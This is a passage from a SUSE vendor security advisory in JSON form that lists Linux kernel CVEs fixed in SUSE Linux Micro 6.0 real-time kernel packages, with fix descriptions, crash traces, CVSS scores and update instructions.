"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-40103"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Enforce expected_attach_type for tailcall compatibility\n\nYinhao et al. recently reported:\n\n Our fuzzer tool discovered an uninitialized pointer issue in the\n bpf_prog_test_run_xdp() function within the Linux kernel\u0027s BPF subsystem.\n This leads to a NULL pointer dereference when a BPF program attempts to\n deference the txq member of struct xdp_buff object.\n\nThe test initializes two programs of BPF_PROG_TYPE_XDP: progA acts as the\nentry point for bpf_prog_test_run_xdp() and its expected_attach_type can\nneither be of be BPF_XDP_DEVMAP nor BPF_XDP_CPUMAP. progA calls into a slot\nof a tailcall map it owns. progB\u0027s expected_attach_type must be BPF_XDP_DEVMAP\nto pass xdp_is_valid_access() validation. The program returns struct xdp_md\u0027s\negress_ifindex, and the latter is only allowed to be accessed under mentioned\nexpected_attach_type. progB is then inserted into the tailcall which progA\ncalls.\n\nThe underlying issue goes beyond XDP though. Another example are programs\nof type BPF_PROG_TYPE_CGROUP_SOCK_ADDR. sock_addr_is_valid_access() as well\nas sock_addr_func_proto() have different logic depending on the programs\u0027\nexpected_attach_type. Similarly, a program attached to BPF_CGROUP_INET4_GETPEERNAME\nshould not be allowed doing a tailcall into a program which calls bpf_bind()\nout of BPF which is only enabled for BPF_CGROUP_INET4_CONNECT.\n\nIn short, specifying expected_attach_type allows to open up additional\nfunctionality or restrictions beyond what the basic bpf_prog_type enables.\nThe use of tailcalls must not violate these constraints. Fix it by enforcing\nexpected_attach_type in __bpf_prog_map_compatible().\n\nNote that we only enforce this for tailcall maps, but not for BPF devmaps or\ncpumaps: There, the programs are invoked through dev_map_bpf_prog_run*() and\ncpu_map_bpf_prog_run*() which set up a new environment / context and therefore\nthese situations are not prone to this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40123",
"url": "https://www.suse.com/security/cve/CVE-2025-40123"
},
{
"category": "external",
"summary": "SUSE Bug 1253365 for CVE-2025-40123",
"url": "https://bugzilla.suse.com/1253365"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40123"
},
{
"cve": "CVE-2025-40134",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40134"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: fix NULL pointer dereference in __dm_suspend()\n\nThere is a race condition between dm device suspend and table load that\ncan lead to null pointer dereference. The issue occurs when suspend is\ninvoked before table load completes:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000054\nOops: 0000 [#1] PREEMPT SMP PTI\nCPU: 6 PID: 6798 Comm: dmsetup Not tainted 6.6.0-g7e52f5f0ca9b #62\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014\nRIP: 0010:blk_mq_wait_quiesce_done+0x0/0x50\nCall Trace:\n \u003cTASK\u003e\n blk_mq_quiesce_queue+0x2c/0x50\n dm_stop_queue+0xd/0x20\n __dm_suspend+0x130/0x330\n dm_suspend+0x11a/0x180\n dev_suspend+0x27e/0x560\n ctl_ioctl+0x4cf/0x850\n dm_ctl_ioctl+0xd/0x20\n vfs_ioctl+0x1d/0x50\n __se_sys_ioctl+0x9b/0xc0\n __x64_sys_ioctl+0x19/0x30\n x64_sys_call+0x2c4a/0x4620\n do_syscall_64+0x9e/0x1b0\n\nThe issue can be triggered as below:\n\nT1 \t\t\t\t\t\tT2\ndm_suspend\t\t\t\t\ttable_load\n__dm_suspend\t\t\t\t\tdm_setup_md_queue\n\t\t\t\t\t\tdm_mq_init_request_queue\n\t\t\t\t\t\tblk_mq_init_allocated_queue\n\t\t\t\t\t\t=\u003e q-\u003emq_ops = set-\u003eops; (1)\ndm_stop_queue / dm_wait_for_completion\n=\u003e q-\u003etag_set NULL pointer!\t(2)\n\t\t\t\t\t\t=\u003e q-\u003etag_set = set; (3)\n\nFix this by checking if a valid table (map) exists before performing\nrequest-based suspend and waiting for target I/O. When map is NULL,\nskip these table-dependent suspend steps.\n\nEven when map is NULL, no I/O can reach any target because there is\nno table loaded; I/O submitted in this state will fail early in the\nDM layer. Skipping the table-dependent suspend logic in this case\nis safe and avoids NULL pointer dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40134",
"url": "https://www.suse.com/security/cve/CVE-2025-40134"
},
{
"category": "external",
"summary": "SUSE Bug 1253386 for CVE-2025-40134",
"url": "https://bugzilla.suse.com/1253386"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40134"
},
{
"cve": "CVE-2025-40135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU in ip6_xmit()\n\nUse RCU in ip6_xmit() in order to use dst_dev_rcu() to prevent\npossible UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40135",
"url": "https://www.suse.com/security/cve/CVE-2025-40135"
},
{
"category": "external",
"summary": "SUSE Bug 1253342 for CVE-2025-40135",
"url": "https://bugzilla.suse.com/1253342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40135"
},
{
"cve": "CVE-2025-40153",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40153"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: hugetlb: avoid soft lockup when mprotect to large memory area\n\nWhen calling mprotect() to a large hugetlb memory area in our customer\u0027s\nworkload (~300GB hugetlb memory), soft lockup was observed:\n\nwatchdog: BUG: soft lockup - CPU#98 stuck for 23s! [t2_new_sysv:126916]\n\nCPU: 98 PID: 126916 Comm: t2_new_sysv Kdump: loaded Not tainted 6.17-rc7\nHardware name: GIGACOMPUTING R2A3-T40-AAV1/Jefferson CIO, BIOS 5.4.4.1 07/15/2025\npstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : mte_clear_page_tags+0x14/0x24\nlr : mte_sync_tags+0x1c0/0x240\nsp : ffff80003150bb80\nx29: ffff80003150bb80 x28: ffff00739e9705a8 x27: 0000ffd2d6a00000\nx26: 0000ff8e4bc00000 x25: 00e80046cde00f45 x24: 0000000000022458\nx23: 0000000000000000 x22: 0000000000000004 x21: 000000011b380000\nx20: ffff000000000000 x19: 000000011b379f40 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffc875e0aa5e2c\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : fffffc01ce7a5c00 x4 : 00000000046cde00 x3 : fffffc0000000000\nx2 : 0000000000000004 x1 : 0000000000000040 x0 : ffff0046cde7c000\n\nCall trace:\n mte_clear_page_tags+0x14/0x24\n set_huge_pte_at+0x25c/0x280\n hugetlb_change_protection+0x220/0x430\n change_protection+0x5c/0x8c\n mprotect_fixup+0x10c/0x294\n do_mprotect_pkey.constprop.0+0x2e0/0x3d4\n __arm64_sys_mprotect+0x24/0x44\n invoke_syscall+0x50/0x160\n el0_svc_common+0x48/0x144\n do_el0_svc+0x30/0xe0\n el0_svc+0x30/0xf0\n el0t_64_sync_handler+0xc4/0x148\n el0t_64_sync+0x1a4/0x1a8\n\nSoft lockup is not triggered with THP or base page because there is\ncond_resched() called for each PMD size.\n\nAlthough the soft lockup was triggered by MTE, it should be not MTE\nspecific. The other processing which takes long time in the loop may\ntrigger soft lockup too.\n\nSo add cond_resched() for hugetlb to avoid soft lockup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40153",
"url": "https://www.suse.com/security/cve/CVE-2025-40153"
},
{
"category": "external",
"summary": "SUSE Bug 1253408 for CVE-2025-40153",
"url": "https://bugzilla.suse.com/1253408"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-40153"
},
{
"cve": "CVE-2025-40158",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40158"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU in ip6_output()\n\nUse RCU in ip6_output() in order to use dst_dev_rcu() to prevent\npossible UAF.\n\nWe can remove rcu_read_lock()/rcu_read_unlock() pairs\nfrom ip6_finish_output2().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40158",
"url": "https://www.suse.com/security/cve/CVE-2025-40158"
},
{
"category": "external",
"summary": "SUSE Bug 1253402 for CVE-2025-40158",
"url": "https://bugzilla.suse.com/1253402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40158"
},
{
"cve": "CVE-2025-40160",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40160"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen/events: Return -EEXIST for bound VIRQs\n\nChange find_virq() to return -EEXIST when a VIRQ is bound to a\ndifferent CPU than the one passed in. With that, remove the BUG_ON()\nfrom bind_virq_to_irq() to propogate the error upwards.\n\nSome VIRQs are per-cpu, but others are per-domain or global. Those must\nbe bound to CPU0 and can then migrate elsewhere. The lookup for\nper-domain and global will probably fail when migrated off CPU 0,\nespecially when the current CPU is tracked. This now returns -EEXIST\ninstead of BUG_ON().\n\nA second call to bind a per-domain or global VIRQ is not expected, but\nmake it non-fatal to avoid trying to look up the irq, since we don\u0027t\nknow which per_cpu(virq_to_irq) it will be in.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40160",
"url": "https://www.suse.com/security/cve/CVE-2025-40160"
},
{
"category": "external",
"summary": "SUSE Bug 1253400 for CVE-2025-40160",
"url": "https://bugzilla.suse.com/1253400"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-40160"
},
{
"cve": "CVE-2025-40167",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40167"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: detect invalid INLINE_DATA + EXTENTS flag combination\n\nsyzbot reported a BUG_ON in ext4_es_cache_extent() when opening a verity\nfile on a corrupted ext4 filesystem mounted without a journal.\n\nThe issue is that the filesystem has an inode with both the INLINE_DATA\nand EXTENTS flags set:\n\n EXT4-fs error (device loop0): ext4_cache_extents:545: inode #15:\n comm syz.0.17: corrupted extent tree: lblk 0 \u003c prev 66\n\nInvestigation revealed that the inode has both flags set:\n DEBUG: inode 15 - flag=1, i_inline_off=164, has_inline=1, extents_flag=1\n\nThis is an invalid combination since an inode should have either:\n- INLINE_DATA: data stored directly in the inode\n- EXTENTS: data stored in extent-mapped blocks\n\nHaving both flags causes ext4_has_inline_data() to return true, skipping\nextent tree validation in __ext4_iget(). The unvalidated out-of-order\nextents then trigger a BUG_ON in ext4_es_cache_extent() due to integer\nunderflow when calculating hole sizes.\n\nFix this by detecting this invalid flag combination early in ext4_iget()\nand rejecting the corrupted inode.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40167",
"url": "https://www.suse.com/security/cve/CVE-2025-40167"
},
{
"category": "external",
"summary": "SUSE Bug 1253458 for CVE-2025-40167",
"url": "https://bugzilla.suse.com/1253458"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40167"
},
{
"cve": "CVE-2025-40170",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40170"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: use dst_dev_rcu() in sk_setup_caps()\n\nUse RCU to protect accesses to dst-\u003edev from sk_setup_caps()\nand sk_dst_gso_max_size().\n\nAlso use dst_dev_rcu() in ip6_dst_mtu_maybe_forward(),\nand ip_dst_mtu_maybe_forward().\n\nip4_dst_hoplimit() can use dst_dev_net_rcu().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40170",
"url": "https://www.suse.com/security/cve/CVE-2025-40170"
},
{
"category": "external",
"summary": "SUSE Bug 1253413 for CVE-2025-40170",
"url": "https://bugzilla.suse.com/1253413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40170"
},
{
"cve": "CVE-2025-40178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npid: Add a judgment for ns null in pid_nr_ns\n\n__task_pid_nr_ns\n ns = task_active_pid_ns(current);\n pid_nr_ns(rcu_dereference(*task_pid_ptr(task, type)), ns);\n if (pid \u0026\u0026 ns-\u003elevel \u003c= pid-\u003elevel) {\n\nSometimes null is returned for task_active_pid_ns. Then it will trigger kernel panic in pid_nr_ns.\n\nFor example:\n\tUnable to handle kernel NULL pointer dereference at virtual address 0000000000000058\n\tMem abort info:\n\tESR = 0x0000000096000007\n\tEC = 0x25: DABT (current EL), IL = 32 bits\n\tSET = 0, FnV = 0\n\tEA = 0, S1PTW = 0\n\tFSC = 0x07: level 3 translation fault\n\tData abort info:\n\tISV = 0, ISS = 0x00000007, ISS2 = 0x00000000\n\tCM = 0, WnR = 0, TnD = 0, TagAccess = 0\n\tGCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n\tuser pgtable: 4k pages, 39-bit VAs, pgdp=00000002175aa000\n\t[0000000000000058] pgd=08000002175ab003, p4d=08000002175ab003, pud=08000002175ab003, pmd=08000002175be003, pte=0000000000000000\n\tpstate: 834000c5 (Nzcv daIF +PAN -UAO +TCO +DIT -SSBS BTYPE=--)\n\tpc : __task_pid_nr_ns+0x74/0xd0\n\tlr : __task_pid_nr_ns+0x24/0xd0\n\tsp : ffffffc08001bd10\n\tx29: ffffffc08001bd10 x28: ffffffd4422b2000 x27: 0000000000000001\n\tx26: ffffffd442821168 x25: ffffffd442821000 x24: 00000f89492eab31\n\tx23: 00000000000000c0 x22: ffffff806f5693c0 x21: ffffff806f5693c0\n\tx20: 0000000000000001 x19: 0000000000000000 x18: 0000000000000000\n\tx17: 00000000529c6ef0 x16: 00000000529c6ef0 x15: 00000000023a1adc\n\tx14: 0000000000000003 x13: 00000000007ef6d8 x12: 001167c391c78800\n\tx11: 00ffffffffffffff x10: 0000000000000000 x9 : 0000000000000001\n\tx8 : ffffff80816fa3c0 x7 : 